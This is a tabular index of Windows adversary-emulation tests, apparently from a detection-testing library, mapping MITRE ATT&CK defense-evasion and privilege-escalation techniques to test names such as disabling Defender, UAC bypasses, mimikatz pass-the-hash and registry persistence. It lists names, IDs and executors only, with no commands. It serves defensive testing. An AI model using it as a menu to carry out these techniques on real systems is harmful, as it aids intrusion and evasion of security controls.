267 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 33 LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell d8c57eaa-497a-4a08-961e-bd5efd7c9374 powershell
268 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 34 Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell 5e27f36d-5132-4537-b43b-413b0d5eec9a powershell
269 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 35 Disable Windows Defender with PwSh Disable-WindowsOptionalFeature f542ffd3-37b4-4528-837f-682874faa012 powershell
270 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 36 WMIC Tamper with Windows Defender Evade Scanning Folder 59d386fc-3a4b-41b8-850d-9e3eee24dfe4 command_prompt
271 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 37 Delete Windows Defender Scheduled Tasks 4b841aa1-0d05-4b32-bbe7-7564346e7c76 command_prompt
272 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 43 Disable Hypervisor-Enforced Code Integrity (HVCI) 70bd71e6-eba4-4e00-92f7-617911dbe020 powershell
273 defense-evasion T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
274 defense-evasion T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
275 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
276 defense-evasion T1027 Obfuscated Files or Information 3 Execute base64-encoded PowerShell from Windows Registry 450e7218-7915-4be4-8b9b-464a49eafcec powershell
277 defense-evasion T1027 Obfuscated Files or Information 4 Execution from Compressed File f8c8a909-5f29-49ac-9244-413936ce6d1f command_prompt
278 defense-evasion T1027 Obfuscated Files or Information 5 DLP Evasion via Sensitive Data in VBA Macro over email 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad powershell
279 defense-evasion T1027 Obfuscated Files or Information 6 DLP Evasion via Sensitive Data in VBA Macro over HTTP e2d85e66-cb66-4ed7-93b1-833fc56c9319 powershell
280 defense-evasion T1027 Obfuscated Files or Information 7 Obfuscated Command in PowerShell 8b3f4ed6-077b-4bdd-891c-2d237f19410f powershell
281 defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
282 defense-evasion T1027 Obfuscated Files or Information 9 Snake Malware Encrypted crmlog file 7e47ee60-9dd1-4269-9c4f-97953b183268 powershell
283 defense-evasion T1027 Obfuscated Files or Information 10 Execution from Compressed JScript File fad04df1-5229-4185-b016-fb6010cd87ac command_prompt
284 defense-evasion T1564.006 Run Virtual Instance 1 Register Portable Virtualbox c59f246a-34f8-4e4d-9276-c295ef9ba0dd command_prompt
285 defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
286 defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
287 defense-evasion T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
288 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 1 Regsvr32 local COM scriptlet execution 449aa403-6aba-47ce-8a37-247d21ef0306 command_prompt
289 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 2 Regsvr32 remote COM scriptlet execution c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 command_prompt
290 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 3 Regsvr32 local DLL execution 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b command_prompt
291 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 4 Regsvr32 Registering Non DLL 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 command_prompt
292 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 5 Regsvr32 Silent DLL Install Call DllRegisterServer 9d71c492-ea2e-4c08-af16-c6994cdf029f command_prompt
293 defense-evasion T1036.003 Masquerading: Rename System Utilities 1 Masquerading as Windows LSASS process 5ba5a3d1-cf3c-4499-968a-a93155d1f717 command_prompt
294 defense-evasion T1036.003 Masquerading: Rename System Utilities 3 Masquerading - cscript.exe running as notepad.exe 3a2a578b-0a01-46e4-92e3-62e2859b42f0 command_prompt
295 defense-evasion T1036.003 Masquerading: Rename System Utilities 4 Masquerading - wscript.exe running as svchost.exe 24136435-c91a-4ede-9da1-8b284a1c1a23 command_prompt
296 defense-evasion T1036.003 Masquerading: Rename System Utilities 5 Masquerading - powershell.exe running as taskhostw.exe ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa command_prompt
297 defense-evasion T1036.003 Masquerading: Rename System Utilities 6 Masquerading - non-windows exe running as windows exe bc15c13f-d121-4b1f-8c7d-28d95854d086 powershell
298 defense-evasion T1036.003 Masquerading: Rename System Utilities 7 Masquerading - windows exe running as different windows exe c3d24a39-2bfe-4c6a-b064-90cd73896cb0 powershell
299 defense-evasion T1036.003 Masquerading: Rename System Utilities 8 Malicious process Masquerading as LSM.exe 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f command_prompt
300 defense-evasion T1036.003 Masquerading: Rename System Utilities 9 File Extension Masquerading c7fa0c3b-b57f-4cba-9118-863bf4e653fc command_prompt
301 defense-evasion T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
302 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 1 Regasm Uninstall Method Call Test 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 command_prompt
303 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 2 Regsvcs Uninstall Method Call Test fd3c1c6a-02d2-4b72-82d9-71c527abb126 powershell
304 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 4 Install root CA on Windows 76f49d86-5eb1-461a-a032-a480f86652f1 powershell
305 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 5 Install root CA on Windows with certutil 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f powershell
306 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 6 Add Root Certificate to CurrentUser Certificate Store ca20a3f1-42b5-4e21-ad3f-1049199ec2e0 powershell
307 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 1 Compile After Delivery using csc.exe ffcdbd6a-b0e8-487d-927a-09127fe9a206 command_prompt
308 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 2 Dynamic C# Compile 453614d8-3ba6-4147-acc0-7ec4b3e1faef powershell
309 defense-evasion T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
310 defense-evasion T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
311 defense-evasion T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
312 defense-evasion T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
313 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
314 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
315 defense-evasion T1564.003 Hide Artifacts: Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
316 defense-evasion T1027.006 HTML Smuggling 1 HTML Smuggling Remote Payload 30cbeda4-08d9-42f1-8685-197fad677734 powershell
317 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 4 Delete a single file - Windows cmd 861ea0b4-708a-4d17-848d-186c9c7f17e3 command_prompt
318 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 5 Delete an entire folder - Windows cmd ded937c4-2add-42f7-9c2c-c742b7a98698 command_prompt
319 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 6 Delete a single file - Windows PowerShell 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 powershell
320 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 7 Delete an entire folder - Windows PowerShell edd779e4-a509-4cba-8dfa-a112543dbfb1 powershell
321 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 9 Delete Prefetch File 36f96049-0ad7-4a5f-8418-460acaeb92fb powershell
322 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 10 Delete TeamViewer Log Files 69f50a5f-967c-4327-a5bb-e1a9a9983785 powershell
323 defense-evasion T1221 Template Injection 1 WINWORD Remote Template Injection 1489e08a-82c7-44ee-b769-51b72d03521d command_prompt
324 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
325 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
326 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
327 defense-evasion T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
328 defense-evasion T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
329 defense-evasion T1220 XSL Script Processing 1 MSXSL Bypass using local files ca23bfb2-023f-49c5-8802-e66997de462d command_prompt
330 defense-evasion T1220 XSL Script Processing 2 MSXSL Bypass using remote files a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 command_prompt
331 defense-evasion T1220 XSL Script Processing 3 WMIC bypass using local XSL file 1b237334-3e21-4a0c-8178-b8c996124988 command_prompt
332 defense-evasion T1220 XSL Script Processing 4 WMIC bypass using remote XSL file 7f5be499-33be-4129-a560-66021f379b9b command_prompt
333 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 3 Create Windows System File with Attrib f70974c8-c094-4574-b542-2c545af95a32 command_prompt
334 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 4 Create Windows Hidden File with Attrib dadb792e-4358-4d8d-9207-b771faa0daa5 command_prompt
335 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 8 Hide Files Through Registry f650456b-bd49-4bc1-ae9d-271b5b9581e7 command_prompt
336 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 1 Alternate Data Streams (ADS) 8822c3b0-d9f9-4daf-a043-49f4602364f4 command_prompt
337 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 2 Store file in Alternate Data Stream (ADS) 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 powershell
338 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 3 Create ADS command prompt 17e7637a-ddaf-4a82-8622-377e20de8fdb command_prompt
339 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 4 Create ADS PowerShell 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 powershell
340 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
341 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
342 defense-evasion T1216 Signed Script Proxy Execution 1 SyncAppvPublishingServer Signed Script PowerShell Command Execution 275d963d-3f36-476c-8bef-a2a3960ee6eb command_prompt
343 defense-evasion T1216 Signed Script Proxy Execution 2 manage-bde.wsf Signed Script Command Execution 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a command_prompt
344 defense-evasion T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
345 defense-evasion T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
346 defense-evasion T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
347 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 1 Lolbin Jsc.exe compile javascript to exe 1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8 command_prompt
348 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 2 Lolbin Jsc.exe compile javascript to dll 3fc9fea2-871d-414d-8ef6-02e85e322b80 command_prompt
349 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
350 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
351 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
352 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
353 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
354 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
355 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
356 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
357 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
358 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
359 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
360 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
361 privilege-escalation T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
362 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
363 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
364 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
365 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
366 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
367 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
368 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
369 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
370 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
371 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
372 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
373 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
374 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
375 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
376 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
377 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
378 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
379 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 18 WinPwn - UAC Magic 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc powershell
380 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 19 WinPwn - UAC Bypass ccmstp technique f3c145f9-3c8d-422c-bd99-296a17a8f567 powershell
381 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 20 WinPwn - UAC Bypass DiskCleanup technique 1ed67900-66cd-4b09-b546-2a0ef4431a0c powershell
382 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 21 WinPwn - UAC Bypass DccwBypassUAC technique 2b61977b-ae2d-4ae4-89cb-5c36c89586be powershell
383 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key 251c5936-569f-42f4-9ac2-87a173b9e9b8 powershell
384 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 23 UAC Bypass with WSReset Registry Modification 3b96673f-9c92-40f1-8a3e-ca060846f8d9 powershell
385 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
386 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
387 privilege-escalation T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
388 privilege-escalation T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
389 privilege-escalation T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
390 privilege-escalation T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
391 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
392 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
393 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
394 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
395 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 5 Remote Service Installation CMD fb4151a2-db33-4f8c-b7f8-78ea8790f961 command_prompt
396 privilege-escalation T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
397 privilege-escalation T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
398 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
399 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
400 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
401 privilege-escalation T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
402 privilege-escalation T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
403 privilege-escalation T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
404 privilege-escalation T1055 Process Injection 3 Section View Injection c6952f41-6cf0-450a-b352-2ca8dae7c178 powershell
405 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
406 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
407 privilege-escalation T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
408 privilege-escalation T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
409 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
410 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
411 privilege-escalation T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
412 privilege-escalation T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
413 privilege-escalation T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
414 privilege-escalation T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
415 privilege-escalation T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
416 privilege-escalation T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
417 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
418 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
419 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
420 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
421 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
422 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
423 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
424 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
425 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
426 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
427 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
428 privilege-escalation T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
429 privilege-escalation T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
430 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
431 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
432 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
433 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
434 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
435 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
436 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
437 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
438 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
439 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
440 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
441 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
442 privilege-escalation T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
443 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
444 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
445 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
